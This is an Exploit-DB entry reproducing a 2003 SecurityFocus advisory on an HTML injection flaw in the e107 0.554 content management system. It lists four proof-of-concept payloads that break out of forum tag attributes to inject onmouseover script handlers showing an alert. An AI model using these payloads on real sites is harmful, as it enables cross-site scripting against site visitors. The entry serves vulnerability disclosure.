e107 Website System 0.554 - HTML Injection

EDB-ID:

22958

CVE:





Platform:

PHP

Date:

2003-07-25


source: https://www.securityfocus.com/bid/8279/info

The e107 content management system is prone to an HTML injection vulnerability. This issue is exposed through the class2.php script. An attacker may exploit this issue by including hostile HTML and script code in certain fields within the form. This code may be rendered in the web browser of a user who views the site.

[img][/img] - [img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link][/link] - [link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email][/email] - [email]/foo@bar.com" onmouseover="alert('Vulnerable');[/email]
[url][/url] - [url]/url.htm" onmouseover="alert('Vulnerable');[/url]